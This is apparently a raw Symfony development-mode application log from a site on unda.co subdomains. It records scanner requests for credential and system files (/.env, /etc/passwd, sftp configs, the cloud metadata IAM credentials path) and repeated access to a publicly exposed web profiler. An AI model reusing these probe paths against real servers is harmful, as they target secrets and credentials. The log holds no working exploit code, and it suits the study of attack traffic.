[2025-12-17 03:48:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sftp-config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sftp-config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 03:48:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 03:48:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e39e45","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e39e45?panel=security","method":"GET"} []
[2025-12-17 03:48:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 03:50:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 03:51:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"48c5ed","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/48c5ed?panel=swiftmailer","method":"GET"} []
[2025-12-17 03:51:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-17 03:53:15] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"0c2be6","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/0c2be6/search/results?ip=189.172.28.162&limit=10&method=GET","method":"GET"} []
[2025-12-17 03:53:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.28.162&limit=10&method=GET","method":"GET"} []
[2025-12-17 03:53:59] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 03:55:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc1006","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc1006?panel=twig","method":"GET"} []
[2025-12-17 03:55:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 04:01:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc1006","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc1006?panel=time","method":"GET"} []
[2025-12-17 04:01:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 04:07:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc1006","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc1006?panel=security","method":"GET"} []
[2025-12-17 04:07:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 04:14:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc1006","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc1006?panel=request","method":"GET"} []
[2025-12-17 04:14:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 04:17:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=exception","method":"GET"} []
[2025-12-17 04:17:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-17 04:18:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:21:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc1006","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc1006?panel=config","method":"GET"} []
[2025-12-17 04:21:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 04:22:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"03fd91","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/03fd91","method":"GET"} []
[2025-12-17 04:22:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 04:27:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc1006","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc1006?panel=cache","method":"GET"} []
[2025-12-17 04:27:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 04:33:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc1006","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc1006","method":"GET"} []
[2025-12-17 04:33:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 04:40:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b02ab3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b02ab3?panel=twig","method":"GET"} []
[2025-12-17 04:40:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 04:41:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:41:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:41:24] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"f89e9a","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/f89e9a/search/results?ip=141.95.74.78&limit=10","method":"GET"} []
[2025-12-17 04:41:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=141.95.74.78&limit=10","method":"GET"} []
[2025-12-17 04:44:23] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-17 04:44:23] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 04:44:23] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:23] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:23] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:23] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:23] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:23] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-17 04:44:23] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-17 04:44:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /latest/meta-data/iam/security-credentials/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /latest/meta-data/iam/security-credentials/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:23] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-17 04:44:23] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-17 04:44:23] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 04:44:23] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:23] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:23] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:24] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:24] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:24] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 04:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /latest/meta-data/iam/security-credentials/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /latest/meta-data/iam/security-credentials/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /latest/meta-data/iam/security-credentials/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /latest/meta-data/iam/security-credentials/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /latest/meta-data/iam/security-credentials/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /latest/meta-data/iam/security-credentials/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /latest/meta-data/iam/security-credentials/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /latest/meta-data/iam/security-credentials/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:24] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 04:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /etc/passwd"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /etc/passwd\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /latest/meta-data/iam/security-credentials/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /latest/meta-data/iam/security-credentials/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /etc/passwd"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /etc/passwd\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /etc/passwd"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /etc/passwd\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /etc/passwd"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /etc/passwd\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:25] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
[2025-12-17 04:44:25] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 04:44:25] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:25] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /etc/passwd"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /etc/passwd\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:26] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:26] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:26] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:26] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
[2025-12-17 04:44:26] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
[2025-12-17 04:44:26] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
[2025-12-17 04:44:26] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 04:44:26] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:26] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:26] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
[2025-12-17 04:44:26] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 04:44:26] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:26] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:26] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
